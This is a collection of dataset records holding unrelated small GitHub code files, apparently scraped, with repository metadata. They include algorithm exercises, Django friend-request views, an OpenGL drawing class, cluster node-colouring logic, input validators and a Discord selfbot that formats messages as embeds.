read(path)\r\nx = preprocessing.Imputer().fit_transform(x)\r\n# Separate class (always in last position, watch impute.py)\r\ny = x[:, len(x[0, :])-1]\r\nx = np.delete(x, len(x[0, :])-1, 1)\r\n\r\na = nn(x[:int(x.shape[0]/5*4),:], y[:int(y.shape[0]/5*4)], x[int(x.shape[0]/5*4):,:], y[int(y.shape[0]/5*4):])\r\nprint(a)\r\n\"\"\"\r\n","repo_name":"unaigarciarena/Discrete","sub_path":"Escritorio/DiscreteCode/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":11331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"7162717903","text":"\nclass Solution:\n    def segregate0and1(self, arr, n):\n        low = 0\n        high = len(arr)-1\n        while (low <= high):\n            if arr[low] == 0:\n                low = low +1\n            else:\n                arr[low],arr[high]=arr[high],arr[low]\n                high = high -1\n        return arr\n\n\nif __name__ == '__main__':\n    tc = int(input())\n    while tc > 0:\n        n = int(input())\n        arr = list(map(int, input().strip().split()))\n        ob = Solution()\n        ob.segregate0and1(arr, n)\n        print(*arr)\n        tc -= 1\n\n","repo_name":"zaidjubapu/dsa450problems","sub_path":"companiesproblems/04Segregate0An1.py","file_name":"04Segregate0An1.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"71725137426","text":"\"\"\"\nGiven a set of positive integers with no duplicates, find the largest divisible subset:\nevery pair (Si, Sj) in the subset must satisfy Si % Sj == 0 or Sj % Si == 0.\n\nIf several subsets qualify, returning any one of them is acceptable.\n\nExample 1:\n\nInput: [1,2,3]\nOutput: [1,2] (of course, [1,3] is also correct)\nExample 2:\n\nInput: [1,2,4,8]\nOutput: [1,2,4,8]\n\"\"\"\n\nclass Solution(object):\n    def largestDivisibleSubset(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: List[int]\n        \"\"\"\n        if not nums:\n            return []\n\n        nums.sort()\n        # For every index, assume the chain ends at that number and record the longest chain length\n        dp = [1] * len(nums)\n\n        # k tracks the index in nums where the largest subset ends\n        k = 0\n        for i in range(len(nums)):\n            for j in range(0, i):\n\n                if nums[i] % nums[j] == 0:\n                    dp[i] = max(dp[i], dp[j] + 1)\n                    # update k to the index of the largest subset found so far\n                    if dp[i] > dp[k]:\n                        k = i\n\n        # start the answer with the largest element of the chain\n        res = [nums[k]]\n\n        while dp[k] > 1:\n            for i in range(k):\n                # retrace the recurrence from back to front\n                if nums[k] % nums[i] == 0 and dp[k] == dp[i] + 1:\n                    # append the predecessor the chain came from\n                    res.append(nums[i])\n                    k = i\n                    break\n\n        # res is now the longest divisible chain\n        return res\n
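\nif __name__ == \"__main__\":\n    # Added usage sketch (not in the original file): the subset is built from the\n    # largest element down, so this prints [8, 4, 2, 1].\n    print(Solution().largestDivisibleSubset([1, 2, 4, 8]))\n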
\n# https://www.acwing.com/video/1754/","repo_name":"Andrewlearning/Leetcoding","sub_path":"leetcode/DP/368m. 最大整除子集(同求最大递增集合300).py","file_name":"368m. 最大整除子集(同求最大递增集合300).py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"26421154198","text":"from django.shortcuts import render,redirect\r\nfrom .forms import UserCreateForm,UserProfileForm,FriendRequestForm\r\nfrom django.contrib.auth import authenticate,login,logout\r\nfrom django.contrib.auth.models import User\r\nfrom .models import UserProfile,FriendRequest\r\nfrom django.contrib.auth.decorators import login_required\r\n# Create your views here.\r\n\r\n@login_required(login_url='login')\r\ndef HomePage(request):\r\n    profile=UserProfile.objects.get(user=request.user)\r\n    friends=profile.friends.all()\r\n    frs=[]\r\n    try :\r\n        frr=FriendRequest.objects.filter(receiver=request.user,is_active=True)\r\n        frs=[]\r\n        for i in frr:\r\n            frs.append(i.sender.username)\r\n    except:\r\n        frs=['No Friends']\r\n    context={'friends':friends,'frs':frs}\r\n\r\n    return(render(request,'home.html',context))\r\n\r\n\r\n\r\n\r\ndef LoginPage(request):\r\n    if(request.user.is_authenticated):\r\n        return redirect('home')\r\n    if(request.method==\"POST\"):\r\n        username=request.POST.get('username')\r\n        password=request.POST.get('password')\r\n        user=authenticate(request,username=username,password=password)\r\n        if user is not None:\r\n            login(request,user)\r\n            return redirect('home')\r\n    return(render(request,'Login.html'))\r\n\r\n\r\n@login_required(login_url='login')\r\ndef SendFrReq(request):\r\n    frf = FriendRequestForm()\r\n    msg=''\r\n    if (request.method == \"POST\"):\r\n        fr = FriendRequestForm(request.POST)\r\n        if(fr.is_valid()):\r\n            freq=fr.save(commit=False)\r\n            freq.sender=request.user\r\n            freq.save()\r\n            msg=\"Friend Request Sent\"\r\n\r\n    return (render(request, 'SendFriendReq.html', {'friendRF': frf,'msg':msg}))\r\n\r\n\r\n\r\ndef RegisterPage(request):\r\n    if(request.user.is_authenticated):\r\n        return redirect('home')\r\n    if(request.method==\"POST\"):\r\n        form=UserCreateForm(request.POST)\r\n        profile_form=UserProfileForm(request.POST)\r\n\r\n        if(form.is_valid() and profile_form.is_valid()):\r\n            user=form.save()\r\n            profile=profile_form.save(commit=False)\r\n            profile.user=user\r\n            profile.save()\r\n            return redirect('login')\r\n\r\n    form = UserCreateForm()\r\n    user_profile_form=UserProfileForm()\r\n    return(render(request,'Register.html',{'form':form,'userprofile':user_profile_form}))\r\n\r\n@login_required(login_url='login')\r\ndef logoutPage(request):\r\n    logout(request)\r\n    return redirect('login')\r\n\r\n\r\ndef SearchChat(request):\r\n\r\n    return(render(request,'ChatSearch.html'))\r\n\r\n@login_required(login_url='login')\r\ndef AcceptFR(request,username):\r\n    usr=User.objects.get(username=username)\r\n    frr=FriendRequest.objects.get(sender=usr,receiver=request.user)\r\n    frr.accept()\r\n    frr.save()\r\n    return redirect('SendFR')\r\n","repo_name":"Murgowt/WeConnect","sub_path":"Backend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"42511747114","text":"input_string = 'dog goat dad duck doodle never'\ninput_string2 = 'racecar'\ninput_string3 = 'A Toyota! Race fast, safe car!'\n\ndef palindrome_search(input_str):\n    result = list()\n    result = palindromes(input_str, result)\n    input_str = input_str.replace(' ', '').lower().replace(',', '').replace('!', '')\n    result = palindromes(input_str, result)\n    result = sorted(set(result))\n    return result\n\ndef palindromes(string, search_result):\n    length = 3\n    while length <= len(string):\n        for i in range(0, len(string) - length + 1, 1):\n            x = string[i:i + length:1]\n            if x == x[:: -1]:\n                search_result.append(x)\n        length += 1\n    return search_result\n\n\n\n\nprint(palindrome_search(input_string))\nprint(palindrome_search(input_string2))\nprint(palindrome_search(input_string3))\n","repo_name":"green-fox-academy/FarkasLaszlo","sub_path":"week-02/day-05/03 Palindrome searcher.py","file_name":"03 Palindrome searcher.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"71725328146","text":"\"\"\"\nGiven an array A[0,1,…,n-1], build an array B[0,1,…,n-1] in which\nB[i] = A[0]×A[1]×…×A[i-1]×A[i+1]×…×A[n-1]. Division must not be used.\n\n\nExample:\nInput: [1,2,3,4,5]\nOutput: [120,60,40,30,24]\n\"\"\"\n\n\nclass Solution(object):\n    def constructArr(self, a):\n        \"\"\"\n        :type a: List[int]\n        :rtype: List[int]\n        \"\"\"\n\n        length = len(a)\n        b = [1 for _ in range(length)]\n\n        for i in range(1, length):\n            b[i] = b[i - 1] * a[i - 1]\n\n        temp = 1\n        # the suffix pass has to start from the far edge, i.e. from a[i+1],\n        # so the first suffix factor pairs b[i] with a[i+1], starting at i+1 = length-1\n        for i in range(length - 2, -1, -1):\n            temp *= a[i + 1]\n            b[i] *= temp\n\n        return b
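\n\nif __name__ == \"__main__\":\n    # Added usage sketch (not in the original file); expected output: [120, 60, 40, 30, 24]\n    print(Solution().constructArr([1, 2, 3, 4, 5]))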
","repo_name":"Andrewlearning/Leetcoding","sub_path":"剑指offer/面试题66. 
构建乘积数组(倒三角相乘238).py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71816851666","text":"limitToResultsContaining = 'NC'\n\nimport rhinoscriptsyntax as rs\nfhand = open('brickstacking/data analysis/yelp_academic_dataset_business.json')\nxCoords = []\nyCoords = []\npoints = []\n\nfor line in fhand:\n if limitToResultsContaining in line:\n line.strip()\n pos = line.find('latitude')\n pos2 = line.find(',',pos)\n pos3 = line.find('longitude')\n pos4 = line.find(',',pos3)\n xCoords.append(float(line[pos+10:pos2]))\n yCoords.append(float(line[pos3+11:pos4]))\n\nfor i in range(len(xCoords)):\n points.append(rs.AddPoint(xCoords[i],yCoords[i],0))\n\nfor i in range(len(points)):\n\tclosest = rs.PointArrayClosestPoint(points,points[i])\n\tdistance = rs.VectorLength(rs.VectorCreate(closest,points[i]))\n\t'''if distance > 1 :\n\t\tpoints.pop(i)'''","repo_name":"rachelalutes/ideas_seminar","sub_path":"brickstacking/data_analysis/Untitled-1.py","file_name":"Untitled-1.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34796896969","text":"\n\n\nclass FunctionTableEntry:\n def __init__(self,id ,name, type, scope = None, belongsTo = None):\n self.id = id\n self.name = name\n self.type = type\n self.scope = scope\n self.belongsTo = belongsTo\n def __str__(self):\n return '{0} {1} {2} {3} {4}'.format(self.id,self.name, self.type, self.scope, self.belongsTo)\n\nclass FunctionTable:\n def __init__(self):\n self.entries = []\n abort = FunctionTableEntry(1,\"abort\",\"Object\", 1,\"Object\")\n type_name= FunctionTableEntry(2,\"type_name\",\"String\", 1,\"Object\")\n copy = FunctionTableEntry(3,\"copy\",\"OBJECT\", 1,\"Object\")\n out_string = FunctionTableEntry(4,\"out_string\",\"IO\", 1,\"IO\")\n out_int = FunctionTableEntry(5,\"out_int\",\"IO\", 1,\"IO\")\n in_string = FunctionTableEntry(6,\"in_string\",\"String\", 1,\"IO\")\n in_int = FunctionTableEntry(7,\"in_int\",\"Int\", 1,\"IO\")\n length = FunctionTableEntry(8,\"length\",\"Int\", 1,\"String\")\n concat = FunctionTableEntry(9,\"concat\",\"String\", 1,\"String\")\n substr = FunctionTableEntry(10,\"substr\",\"String\", 1,\"String\")\n self.entries.append(abort)\n self.entries.append(type_name)\n self.entries.append(copy)\n self.entries.append(out_string)\n self.entries.append(out_int)\n self.entries.append(in_string)\n self.entries.append(in_int)\n self.entries.append(length)\n self.entries.append(concat)\n self.entries.append(substr)\n\n def addEntry(self, FunctionTableEntry):\n if self.findEntryByName(FunctionTableEntry.name, FunctionTableEntry.belongsTo) is None:\n self.entries.append(FunctionTableEntry)\n return True\n else:\n return False\n\n def findEntryByName(self, name, belongsTo):\n for entry in self.entries:\n if entry.name == name and entry.belongsTo == belongsTo:\n return entry \n return None\n \n def findEntryByID(self, id):\n for entry in self.entries:\n if entry.id == id:\n return entry\n return None\n\n","repo_name":"michelebenvenuto/compiladores2022","sub_path":"tables/FunctionTable.py","file_name":"FunctionTable.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11633500592","text":"import math\nimport threading\nfrom typing import List, Optional\n\nfrom consts import *\nfrom messaging import send_message, Message, 
MessageType\nfrom utils import create_timeout, log\nimport copy\n\n\nclass Cluster:\n def __init__(self, ip_network: str, ip_offset: int, nodes_count: int, current_node: int):\n self.ip_network = ip_network\n self.ip_offset = ip_offset\n self.nodes_count = nodes_count\n self.current_node = current_node\n\n self.leader = None\n\n self.ips = [self.ip_network + \".\" + str(self.ip_offset + i) for i in range(self.nodes_count)]\n self.colors: List[Optional[str]] = [None for i in range(self.nodes_count)]\n self.alive = [False for i in range(self.nodes_count)]\n\n self.color_nodes_timer = None\n self.colors_check_timer: threading.Timer = create_timeout(COLORS_CHECK_INTERVAL, self.color_check)\n\n def get_higher_ids(self, higher_than) -> List[int]:\n return [i for i in range(higher_than + 1, self.nodes_count)]\n\n def get_lower_ids(self, lower_than) -> List[int]:\n return [i for i in range(0, lower_than)]\n\n def convert_to_ips(self, ids: List[int]):\n return [self.ips[i] for i in ids]\n\n def leader_changed(self, new_leader):\n self.leader = new_leader\n self.color_check()\n\n def color_check(self):\n self.colors_check_timer: threading.Timer = create_timeout(COLORS_CHECK_INTERVAL, self.color_check)\n\n if self.leader == self.current_node:\n self.check_alive()\n self.color_nodes_timer = create_timeout(ALIVE_TIMEOUT, self.color_nodes) # check for check alive to finish\n\n def check_alive(self):\n for i in range(self.nodes_count):\n self.alive[i] = False\n send_message(self.ips[i], Message(MessageType.PING, self.current_node, \"\"))\n\n def pong_received(self, node_id):\n self.alive[node_id] = True\n\n def color_nodes(self):\n if self.leader is None:\n return\n\n changed = self.__determine_coloring()\n\n if changed:\n for i in range(self.nodes_count):\n send_message(self.ips[i], Message(MessageType.COLOR, self.current_node, self.colors[i]))\n\n def __determine_coloring(self):\n total_live = self.alive.count(True)\n log(\"alive: \" + str(self.alive) + \" (count: \" + str(total_live) + \")\")\n\n green_nodes_left = math.ceil(total_live * GREEN_COLOR_REQUIRED)\n\n new_colors = [None for i in range(self.nodes_count)]\n\n new_colors[self.leader] = \"GREEN\" # leader always green\n green_nodes_left -= 1\n\n for i in range(self.nodes_count):\n if i == self.leader:\n continue\n\n if self.alive[i]:\n if i < green_nodes_left:\n new_colors[i] = \"GREEN\"\n green_nodes_left -= 1\n else:\n new_colors[i] = \"RED\"\n else:\n new_colors[i] = \"-\"\n\n if self.colors == new_colors:\n log(\"coloring ok\")\n log(str(self.colors))\n return False\n else:\n self.colors = new_colors\n log(\"new colors assigned\")\n log(str(self.colors))\n return True\n","repo_name":"lukasvlc3k/ds-01","sub_path":"cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33124948930","text":"from OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\n\nimport os\nimport math\nimport numpy as np\n\nclass Drawing:\n\n def __init__(self):\n return None\n\n def Baseline(self):\n for i in range(200):\n glLineWidth(2.0)\n glBegin(GL_LINES)\n if i==100:\n glColor3f(1,1,0) # x축\n glVertex3fv([1,0,0])\n glVertex3fv([0,0,0])\n glColor3f(0,1,0) # z축\n glVertex3fv([0,0,1])\n glVertex3fv([0,0,0])\n \n glColor3f(0.5,0.5,0.5)\n glVertex3fv([100,0,0])\n glVertex3fv([1,0,0])\n glVertex3fv([0,0,0])\n glVertex3fv([-100,0,0])\n glVertex3fv([0,0,100])\n glVertex3fv([0,0,1])\n glVertex3fv([0,0,0])\n 
glVertex3fv([0,0,-100])\n            else :\n                glColor3f(0.5,0.5,0.5)\n                glVertex3fv([-100+i,0,-100])\n                glVertex3fv([-100+i,0,100])\n                glVertex3fv([100,0,-100+i])\n                glVertex3fv([-100,0,-100+i])\n            glEnd()\n\n        glLineWidth(2.0)\n        glBegin(GL_LINES)\n        glColor3f(0,0,1)\n        glVertex3fv([0,1,0])\n        glVertex3fv([0,0,0])\n        glEnd()\n\n\n    def Box(self,degree):\n        glutSolidCube(1.0)\n\n    def Sphere(self,degree):\n        glutSolidSphere(degree,30,30)\n\n    def Draw_Skeleton(self,Pos,Euler,Scale,Name):\n        glPushMatrix()\n        glTranslatef(Pos[0],Pos[1],Pos[2])\n        glMultMatrixf(Euler.T)\n        glScalef(Scale[0],Scale[1],Scale[2])\n\n        if Name == \"Ground\":\n            glColor3f(0.1,0.1,0.0)\n            self.Box(1.0)\n\n        else :\n            glColor3f(0.0,0.5,0.2)\n            self.Sphere(1.0)\n        glPopMatrix()\n        glFlush()\n","repo_name":"Winteradio/JJOL_JAK","sub_path":"Drawing.py","file_name":"Drawing.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"43978725022","text":"#Step 1. Welcome the user\r\nprint('welcome to the multiplication table')\r\n#2)Step 2. Print out instructions\r\nprint('please enter the number you want to view its multiplication table')\r\n#3)Step 3. Ask the user to enter a value\r\nvalue= int(input('please enter a number:'))\r\n#4)Step 4. Print out the multiplication table\r\nfor i in range(1,13,1):\r\n    print(value, '*', i, '=', value * i)\r\n#5)Step 5. Stop\r\nprint('stop')\r\n\r\nupper_limit= int(input('please input an upper limit:'))\r\nnumber_list = []\r\nprime_number_list = []\r\nupper_limit = upper_limit +1\r\nfor i in range(2, upper_limit, 1):\r\n    number_list.append(i)\r\n    print(len(number_list))\r\n\r\nprime_number= 2\r\n\r\nwhile True:\r\n    # sieve out every multiple of the current prime (including the prime itself)\r\n    number_list = [i for i in number_list if i % prime_number != 0]\r\n    print(len(number_list))\r\n    prime_number_list.append(prime_number)\r\n    if len(number_list) == 0:\r\n        break\r\n    prime_number = number_list.pop(0)\r\nprint(prime_number_list)\r\n","repo_name":"abdullateef28/c_l_project_shoyinka_lateef","sub_path":"codemultable.py","file_name":"codemultable.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"34586487862","text":"#- Write a function that validates Hungarian mobile numbers:\n#\t- Possible mobile formats: \"06 20 123-45 67\", \"+36 301234567\", any others??\n#\t- \"area codes\": 20 30 70 50 31 ?\n\n\ndef mobilszamellenorzes(szam: str):\n    szam = szam.replace(' ','')\n    szam = szam.replace('-','')\n    if szam[0]=='+':\n        szam = '00' + szam[1:]\n    if szam[0:4] =='0036':\n        szam=szam.replace('0036', '06')\n    if szam[0:2] != '06':\n        return False\n    if szam[2:4] != '20' and szam[2:4] !='30' and szam[2:4] !='70' and szam[2:4] !='50':\n        return False\n    if len(szam) !=11:\n        return False\n    return True\n\n\nszam= input('Adja meg a telefonszámot:')\nif mobilszamellenorzes(szam) == True:\n    print('A mobiltelefon szám helyes')\nelse:\n    print('A mobiltelefon szám helytelen')","repo_name":"fabrykevin/agazati","sub_path":"agazatialapvizsgagyujt/python + web kész feladatok + leírás (saját)/Python/20230215/mobil.py","file_name":"mobil.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"16804024904","text":"import os, sys\nimport numpy as np \n\ndef parse_args_from_config(config_path):\n\n    import importlib.util\n\n    spec = importlib.util.spec_from_file_location(\"get_hyperparameters\", config_path )\n\n    modulevar = importlib.util.module_from_spec(spec)\n    spec.loader.exec_module(modulevar)\n\n    return modulevar\n
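\n# Added usage sketch (illustrative; the config path and its contents are assumptions):\n#     cfg = parse_args_from_config(\"configs/experiment.py\")\n#     print(vars(cfg))  # attributes defined at top level of the config module\n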
\ndef tensor_rgb2bgr(image):\n    permute = [2, 1, 0]\n    return image[:, permute]\n\n\ndef print_dataset_dist(sample_dict, prefix):\n    WARNING = '\\033[93m'\n    ENDC = '\\033[0m'\n\n    num_total_samples = 0\n\n    for k, v in sample_dict.items():\n        num_total_samples += v\n\n    class_indices = list(sample_dict.keys())\n    class_indices.sort()\n\n    thres = 100 / len(sample_dict.keys())\n\n    print('='*5, prefix, str(num_total_samples), '='*5)\n\n    for class_idx in class_indices:\n        k = class_idx\n        v = sample_dict[class_idx]\n        ratio = (v/num_total_samples) * 100\n        message = '{} : {} ({:.4f}%)'.format(k, v, ratio)\n\n        if ratio < thres:\n            color = WARNING\n        else:\n            color = ENDC\n\n        print ('{}{}{}'.format(color, message, ENDC))\n    print ('')\n\ndef tensor2numpy(tensor_image):\n    return tensor_image.cpu().numpy().astype(np.float32).transpose(1,2,0)","repo_name":"jeonggyu-kang/age_prediction","sub_path":"utils/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"14268360968","text":"import discord, random\nfrom discord.ext import commands\nimport os\nimport getpass\nos.system('cls')\nprint(r'''\n .-._ _,-,\n `._`-._ _,-'_,'\n `._ `-._ _,-' _,'\n `._ `-._ __.-----.__ _,-' _,'\n `._ `#===\"\"\" \"\"\"===#' _,'\n `._/) ._ _. (\\_,'\n )*' **.__ __.** '*( \n # .==..__ \"\" \"\" __..==, # \nxo#1010 # `\"._(_). .(_)_.\"' # EV1L IN5IDE\nogu: nemo discord: xo#1010\nig: w3ax github: scxr''')\nTOKEN = getpass.getpass('Enter your token here : ')\nprefix = '!'\nbot = commands.Bot(command_prefix=prefix, self_bot=True)\n\n\n@bot.event\nasync def on_ready():\n    print(\"Bot presence t u r n e d on ( ͡° ͜ʖ ͡°)\")\n\n\n@bot.command()\nasync def embed(ctx, *, message):\n    message_arr = message.split('\\n')\n    if len(message_arr) < 2:\n        print('''[ERROR] Your message format should be the following:\\n\n        !embed\n        title here (required)\n        description here (required)\n        embed_thumbnail (optional)''')\n        return\n    title = message_arr[0]\n    thumbnail_url = None\n    description = message_arr[1]\n\n    if len(message_arr) == 3:\n        thumbnail_url = message_arr[2]\n\n    embed = discord.Embed(title=title, description=description, colour=random.randint(0, 0xFFFFFF))\n    if thumbnail_url != None:\n        embed.set_thumbnail(url=thumbnail_url)\n    await ctx.send(embed=embed)\n    await ctx.message.delete()\n\n\n\nbot.run(TOKEN, bot=False)","repo_name":"scxr/selfbots","sub_path":"message_embedder.py","file_name":"message_embedder.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"1857386914","text":"# USACO 2018 Feb Bronze: Taming the Herd\nfile = open(\"taming.in\", \"r\")\noutput = open(\"taming.out\", \"w\")\nn = int(file.readline())\nbreakdays = list(map(int, file.readline().split()))\nfile.close()\n\n# day 1 always has a breakout, so its log entry must be 0 (or unknown)\nvalid = breakdays[0] in (-1, 0)\nbreakdays[0] = 0\nt = -1    # value forced on the current day by a later known entry\nreq = 0   # forced breakouts (the minimum)\npos = 0   # unconstrained days, each of which could hide one extra breakout\nfor j in range(n - 1, -1, -1):\n    if t != -1 and breakdays[j] != -1 and breakdays[j] != t:\n        valid = False  # the log contradicts itself\n    if t == -1:\n        t = breakdays[j]\n    if breakdays[j] == -1:\n        breakdays[j] = t\n    if breakdays[j] == 0:\n        req += 1\n    if breakdays[j] == -1:\n        pos += 1\n    if t > -1:\n        t -= 1\n\nans = '-1' if not valid else str(req) + ' ' + str(req + pos)\noutput.write(ans)\noutput.close()\n
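\n# Added worked example: n = 4, log \"-1 -1 -1 1\".\n# Day 4 says the last breakout was 1 day earlier, forcing a breakout on day 3;\n# day 1 is always a breakout; day 2 is free, so the program writes \"2 3\".\n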
","repo_name":"funnoodle11/USACO","sub_path":"2018FebBronze/taming.py","file_name":"taming.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"42828037166","text":"#https://www.w3resource.com/python-exercises/python-basic-exercises.php\r\n#22. Write a Python program to count the number 4 in a given list.\r\n\r\nnumbers = [1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5]\r\ncount = 0\r\n\r\nfor x in numbers:\r\n\tif x == 4:\r\n\t\tcount = count + 1\r\n\t\t\r\nprint(\"Found \" + str(count) + \" instances of 4.\")","repo_name":"benryan03/Python-Practice","sub_path":"basic-part1-exercise022-count.py","file_name":"basic-part1-exercise022-count.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"9913942442","text":"from marshmallow import Schema, fields\nfrom marshmallow import ValidationError\n\nimport typing as t\n\n\nclass InvalidInputError(Exception):\n    \"\"\"Invalid model input.\"\"\"\n\n\n# List of column names to change before validation\nSYNTAX_ERROR_FIELD_MAP = {}\n\n\nclass TitanicDataRequestSchema(Schema):\n    pclass = fields.Integer()\n    sex = fields.Str()\n    age = fields.Float(allow_none=True)\n    sibsp = fields.Integer(allow_none=True)\n    parch = fields.Integer(allow_none=True)\n    fare = fields.Float(allow_none=True)\n    cabin = fields.Str(allow_none=True)\n    embarked = fields.Str(allow_none=True)\n    title = fields.Str(allow_none=True)\n\n\ndef _filter_error_rows(errors: dict,\n                       validated_input: t.List[dict]) -> t.List[dict]:\n    \"\"\"Remove input data rows with errors.\"\"\"\n\n    indexes = errors.keys()\n    # Delete them in reverse order so we don't\n    # throw off the subsequent indexes\n    for index in sorted(indexes, reverse=True):\n        del validated_input[index]\n\n    return validated_input\n\n\ndef validate_inputs(input_data):\n    \"\"\"Check prediction inputs against schema.\"\"\"\n\n    # set many=True to allow passing in a list\n    schema = TitanicDataRequestSchema(strict=True, many=True)\n\n    # Convert syntax error field names (beginning with numbers)\n    for row in input_data:\n        for key, value in SYNTAX_ERROR_FIELD_MAP.items():\n            row[value] = row[key]\n            del row[key]\n\n    errors = None\n    try:\n        schema.load(input_data)\n    except ValidationError as exc:\n        errors = exc.messages\n        print(f\"ERROR MSG: {exc.messages}\")\n        print(f\"ERROR DATA: {exc.data}\")\n        print(f\"ERROR FIELDS: {exc.fields}\")\n\n    # convert syntax error field names back\n    # NOTE: Never name your data fields with\n    # numbers as the first letter\n    for row in input_data:\n        for key, value in SYNTAX_ERROR_FIELD_MAP.items():\n            row[key] = row[value]\n            del row[value]\n\n    if errors:\n        validated_input = _filter_error_rows(\n            errors=errors, validated_input=input_data\n        )\n    else:\n        validated_input = input_data\n\n    return validated_input, errors\n
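\n# Added usage sketch (illustrative; the row values are made up):\n#     rows = [{\"pclass\": 3, \"sex\": \"male\", \"age\": 22.0, \"sibsp\": 1, \"parch\": 0,\n#              \"fare\": 7.25, \"cabin\": None, \"embarked\": \"S\", \"title\": \"Mr\"}]\n#     validated, errors = validate_inputs(rows)  # errors is None when every row passes\n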
","repo_name":"JCupe17/deploying-ml-test","sub_path":"packages/ml_api/api/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"2848635925","text":"#!/usr/bin/python\n\nimport sys\nimport superclass\n\nclass PrettyPrint( superclass.MetaPrettyPrinter ):\n\n    NAME = 'swapon-pp'\n    DESCRIPTION=\"\"\"Show swap areas in canonical style.\"\"\"\n\n    def __init__( self ):\n        super( PrettyPrint, self ).__init__()\n        return\n\n    def pre_begin_file( self, name = None ):\n        self.titles = []\n        self.areas = dict()\n        self.widths = []\n        return\n\n    def next_line( self, line ):\n        tokens = line.split()\n        L = len( tokens )\n        if L > 0:\n            if not self.titles:\n                self.titles = tokens\n                self.widths = [ len( t ) for t in self.titles ]\n            elif L == len(self.titles):\n                mountpoint = tokens[0]\n                self.areas[ mountpoint ] = tokens\n                self.widths = [\n                    max(\n                        self.widths[i],\n                        len( tokens[i] )\n                    )\n                    for i in range( L )\n                ]\n        return\n\n    def report( self, final = False ):\n        if final:\n            pass\n        elif len( self.areas ) > 0:\n            N = len( self.widths )\n            fmts = [\n                '{{0:<{0}}}'.format( self.widths[ i ] )\n                for i in range( N )\n            ]\n            titles = [\n                fmts[ i ].format( self.titles[ i ] )\n                for i in range( N )\n            ]\n            self.println()\n            self.println( ' '.join( titles ) )\n            for mountpoint in sorted(\n                self.areas,\n                # Sort by name within priority\n                key = lambda m : ( int( self.areas[ m ][ 4 ] ), m )\n            ):\n                tokens = self.areas[ mountpoint ]\n                columns = [\n                    fmts[ i ].format( tokens[ i ] )\n                    for i in range( len( tokens ) )\n                ]\n                self.println( ' '.join( columns ) )\n            pass\n        return\n","repo_name":"megacoder/generic-prettyprinter","sub_path":"genpp/swapon-plugin.py","file_name":"swapon-plugin.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"72981572305","text":"from common import raw\n\nimport collections\n\n\nages = collections.deque([0] * 9)\n\nfor age in raw.split(','):\n    ages[int(age)] += 1\n
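\n# Added note: rotating the deque left by one moves every timer bucket down a day;\n# the old day-0 fish wrap around to index 8 as their newborns, and are also\n# added back at index 6 to reset the parents' timers.\n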
\nfor i in range(80):\n    ages.rotate(-1)  # that's a rotate!\n    ages[6] += ages[8]\n\nprint('Part 1:', sum(ages))\n\nfor i in range(256 - 80):\n    ages.rotate(-1)\n    ages[6] += ages[8]\n\nprint('Part 2:', sum(ages))\n","repo_name":"avayert/aoc2021","sub_path":"src/06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
